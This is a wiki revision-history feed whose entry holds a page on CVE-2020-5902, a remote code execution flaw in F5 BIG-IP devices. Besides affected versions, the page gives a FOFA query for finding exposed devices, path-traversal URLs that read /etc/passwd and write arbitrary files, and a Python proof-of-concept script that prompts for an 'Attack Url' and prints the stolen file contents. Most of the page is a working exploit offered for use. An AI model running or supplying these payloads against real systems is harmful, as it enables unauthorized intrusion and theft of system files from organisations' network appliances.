<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2020-5902_F5_BIG-IP_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E%2Fen</id>
	<title>CVE-2020-5902 F5 BIG-IP 遠程代碼執行漏洞/en - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2020-5902_F5_BIG-IP_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E%2Fen"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2020-5902_F5_BIG-IP_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/en&amp;action=history"/>
	<updated>2026-04-07T08:10:51Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2020-5902_F5_BIG-IP_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/en&amp;diff=4443&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;CVE-2020-5902 F5 BIG-IP remote code execution vulnerability&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2020-5902_F5_BIG-IP_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/en&amp;diff=4443&amp;oldid=prev"/>
		<updated>2021-06-09T10:03:11Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;CVE-2020-5902 F5 BIG-IP remote code execution vulnerability&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;languages /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Vulnerability Impact==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
F5 BIG-IP 15.x: 15.1.0.4&lt;br /&gt;
&lt;br /&gt;
F5 BIG-IP 14.x: 14.1.2.6&lt;br /&gt;
&lt;br /&gt;
F5 BIG-IP 13.x: 13.1.3.4&lt;br /&gt;
&lt;br /&gt;
F5 BIG-IP 12.x: 12.1.5.2&lt;br /&gt;
&lt;br /&gt;
F5 BIG-IP 11.x: 11.6.5.2&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==FOFA==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
title=&amp;quot;BIG-IP&amp;amp;reg ;- Redirect&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Exploit==&lt;br /&gt;
===Read file===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
http://xxx.xxx.xxx.xxx/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Write file===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
http://xxx.xxx.xxx.xxx/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp&lt;br /&gt;
&lt;br /&gt;
POST: fileName=/tmp/test.txt&amp;amp;content=test&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
import requests&lt;br /&gt;
import sys&lt;br /&gt;
import json&lt;br /&gt;
from requests.packages.urllib3.exceptions import InsecureRequestWarning&lt;br /&gt;
&lt;br /&gt;
def title():&lt;br /&gt;
    print('+------------------------------------------')&lt;br /&gt;
    print('+  \033[34mPOC_Des: http://wiki.peiqi.tech                                   \033[0m')&lt;br /&gt;
    print('+  \033[34mGithub : https://github.com/PeiQi0                                 \033[0m')&lt;br /&gt;
    print('+  \033[34m公众号 : PeiQi文库                                                     \033[0m')&lt;br /&gt;
    print('+  \033[34mVersion: F5 BIG-IP                                                \033[0m')&lt;br /&gt;
    print('+  \033[36m使用格式: python3 CVE-2020-5902.py                                  \033[0m')&lt;br /&gt;
    print('+  \033[36mUrl         &amp;gt;&amp;gt;&amp;gt; http://xxx.xxx.xxx.xxx                             \033[0m')&lt;br /&gt;
    print('+------------------------------------------')&lt;br /&gt;
&lt;br /&gt;
def POC_1(target_url):&lt;br /&gt;
    version_url = target_url + &amp;quot;/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd&amp;quot;&lt;br /&gt;
    headers = {&lt;br /&gt;
        &amp;quot;User-Agent&amp;quot;: &amp;quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36&amp;quot;,&lt;br /&gt;
        &amp;quot;Accept-Language&amp;quot;:&amp;quot;zh-CN,zh;q=0.9&amp;quot;,&lt;br /&gt;
    }&lt;br /&gt;
    try:&lt;br /&gt;
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)&lt;br /&gt;
        response = requests.get(url=version_url, timeout=10, verify=False, headers=headers)&lt;br /&gt;
        if &amp;quot;output&amp;quot; in response.text:&lt;br /&gt;
            print(&amp;quot;\033[32m[o] 目标 {} 存在漏洞，响应为:\n{}\033[0m&amp;quot;.format(target_url, json.loads(response.text)[&amp;quot;output&amp;quot;]))&lt;br /&gt;
        else:&lt;br /&gt;
            print(&amp;quot;\033[31m[x] 目标漏洞无法利用 \033[0m&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
    except Exception as e:&lt;br /&gt;
        print(&amp;quot;\033[31m[x] 目标漏洞无法利用 ,{}\033[0m&amp;quot;.format(e))&lt;br /&gt;
        sys.exit(0)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
if __name__ == '__main__':&lt;br /&gt;
    title()&lt;br /&gt;
    target_url = str(input(&amp;quot;\033[35mPlease input Attack Url\nUrl &amp;gt;&amp;gt;&amp;gt; \033[0m&amp;quot;))&lt;br /&gt;
    POC_1(target_url)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Reference==&lt;br /&gt;
https://short.pwnwiki.org/?c=Kum2Ch&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>